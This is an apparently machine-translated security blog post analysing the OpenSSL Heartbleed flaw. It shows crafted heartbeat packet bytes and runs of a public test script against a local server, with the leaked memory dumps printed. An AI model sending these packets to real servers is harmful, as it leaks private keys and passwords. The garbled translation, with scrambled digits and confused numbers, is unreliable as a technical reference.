Than imagined more terror! OpenSSL“effort”vulnerability in-depth analysis-vulnerability warning-the black bar safety net

Author: yaoxi original source http://blog.wangzhan.360.cn/

Recently, OpenSSL broke this year’s most serious security vulnerability in the hacker community is named“heart bleed”vulnerability. 3 6 0 site Guard security team of the vulnerability analysis, the vulnerability is not only related to https at the beginning of the URL, but also includes indirect use of the OpenSSL code products and services, such as VPN, mail system, FTP tools and other products and services, and may even be related to some other security facilities of the source code.

The affected version

OpenSSL1. 0. 1, The 1.0.1 a, 1.0.1 b, 1.0.1 c, 1.0.1 d, 1.0.1 e, 1.0.1 f, Beta 1 of OpenSSL 1.0.2 and other versions.

Vulnerability detail description: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160

Vulnerability description

OpenSSL in the realization of the TLS and DTLS heartbeat processing logic, the presence of coding defects. OpenSSL’s heartbeat processing logic does not detect a heartbeat packet in the length field and subsequent data fields are consistent, the attacker can take advantage of this, structural abnormalities of the data packet, to obtain the heartbeat data where the memory area of the subsequent data. These data may be contained in a certificate private key, user name, user password, user email and other sensitive information. The vulnerability allows an attacker read from memory up to 64KB of data.

A few days ago of a vulnerability analysis of the articles the main focus in turn on HTTPS on the site, ordinary users may think that only the website their business will be affected by this vulnerability. From 3 6 0 websites guards Openssl effort loophole online testing platform(wangzhan. 3 6 0. cn/heartbleed)monitoring data that, effort to exploit the range of radiation has been from the open HTTPS site extends to the VPN system and the mail system, The current Total Domestic total 2 5 1 a VPN system and a 7 2 5 a mail system to the presence of the same vulnerability, including many government websites, key universities and related security vendors.

In order to better allow everyone to understand that the Openssl effort loophole in the end is which aspects of a problem, we use the OpenSSL lib library to write a does not depend on any business separate server program, a step-by-step the actual debug over the code, in order to prove that not only is the https site has a problem, as long as the use of the existence of the vulnerability in the OpenSSL libssl. so the gallery app there are security vulnerabilities that!

The test environment

OS: CentOS release 6.4 (Final)

OpenSSL: Version 1.0.1 f Do not open the OPENSSL_NO_HEARTBEATS compile options

Write a Server program: monitor port 9 8 7 6

Vulnerability testing

Use the online python validation script https://gist.github.com/RixTox/10222402 test

Structural abnormalities of the heartbeat data packet, mainly to add the exception of the length field value.

Test one:

HeartBeat Requst packet

hb = h2bin(”’

1 8 0 3 0 2 0 0 0 3

0 1 2 0 0 0

”’)

Blue 0 1 represents the heartbeat packet of type request direction. The corresponding source code is #define TLS1_HB_REQUEST 1

Red 2 0 0 0 indicates that the heartbeat request packet length field, accounting for two bytes, corresponding to the length value of 8 1 of 9 2 of.

The HeartBeat Response packet

[root@server test]# python ssltest.py 127.0.0.1-p 9 8 7 6 > 1

Sending heartbeat request…

… received message: type = 2 4, ver = 0 3 0 2, length = 8 2 1 1

Received heartbeat response:

WARNING: server returned more data than it should – server is vulnerable!

Received heartbeat response:

0 0 0 0: 0 2 2 0 0 0 D8 0 3 0 2 5 3 4 3 5B 9 0 9D 9B 7 2 0B BC 0C. … SC[…r…

0 0 1 0: BC 2B 9 2 A8 4 8 9 7 CF BD 3 9 0 4 CC 1 6 0A 8 5 0 3 9 0 .+… H…9…

0 0 2 0: 9F 7 7 0 4 3 3 D4 DE 0 0 0 0 6 6 C0 1 4 C0 0A C0 2 2 C0 . w. 3… f…".

0 0 3 0: 2 1 0 0 3 9 0 0 3 8 0 0 8 8 0 0 8 7 C0 0F C0 0 5 0 0 3 5 0 0 !. 9. 8… 5.

Blue 0 2 represents the heartbeat packet type response direction.

The corresponding source code is #define TLS1_HB_RESPONSE 2

Red 2 0 0 0 represented by the heartbeat response packet length field, accounting for two bytes, corresponding to the length value of 8 1 of 9 2 of. And the request packet length value.

The green part is the illegal access to cross-border data(which may include Username, Password, e-mail, internal network IP and other sensitive information).

Test two:

In the test on the basis of one, modify the request heartbeat packets, the length field’s value from 2 to 0 0 0 to 3 0 0 0

HeartBeat Requst packet

hb = h2bin("’

1 8 0 3 0 2 0 0 0 3

0 1 3 0 0 0

"')

3 0 0 0 two bytes corresponding to the length 1 2 2 8 8 out of 8 1 9 2+4 0 9 6）

The HeartBeat Response packet

[root@server test]# python ssltest.py 127.0.0.1-p 9 8 7 6 > 1

Sending heartbeat request…

… received message: type = 2 4, ver = 0 3 0 2, length = 1 2 3 0 7

Received heartbeat response:

WARNING: server returned more data than it should – server is vulnerable!

Received heartbeat response:

0 0 0 0: 0 2 3 0 0 0 D8 0 3 0 2 5 3 4 3 5B 9 0 9D 9B 7 2 0B BC 0C .0… SC[…r…

0 0 1 0: BC 2B 9 2 A8 4 8 9 7 CF BD 3 9 0 4 CC 1 6 0A 8 5 0 3 9 0 .+… H…9…

0 0 2 0: 9F 7 7 0 4 3 3 D4 DE 0 0 0 0 6 6 C0 1 4 C0 0A C0 2 2 C0 . w. 3… f…".

0 0 3 0: 2 1 0 0 3 9 0 0 3 8 0 0 8 8 0 0 8 7 C0 0F C0 0 5 0 0 3 5 0 0 !. 9. 8… 5.

Two test cases, the response of the length of the length value is always greater than the request length of the multi-out 1 9 a byte, why?

Because, TLS and DTLS in dealing with the type of TLS1_HB_REQUEST the heartbeat request packet logic, from the heap space on the application memory size, there are 4 part of the decision type+length+request data length+pad, where type,length,pad the field into account for 1byte and 2byte, the 16byte, so the response data is always better than the request of many out 19byte it.

Source code analysis

Outline

The vulnerability is mainly a memory leak problem, and the fundamental is because OpenSSL in the handling heartbeat request packet, not to the length field for 2byte, you can identify the data length is 64KB and the subsequent data fields do compliance testing. Generate a heartbeat response packet, the direct use of a length corresponding to the length from heap space application memory, not only is the real request data is much smaller than the length identified in length.

Related to parsing the source code description

The vulnerability exists in the source file there are two ssl/d1_both. c and ssl/t1_lib. c.

Heartbeat processing logic, respectively, is dtls1_process_heartbeat and tls1_process_heartbeat two functions.

dtls1_process_heartbeat function processing logic:

Step1. Get heartbeat request packet corresponding to the SSLv3 record the data in the pointer field pointing to the request of the requested data portion.

unsigned char *p = &s->s3->rrec. data[0];

record the data format should contain three fields: type, length, data; respectively accounted for 1byte and 2byte, the length of the actual value.

[1] [2] next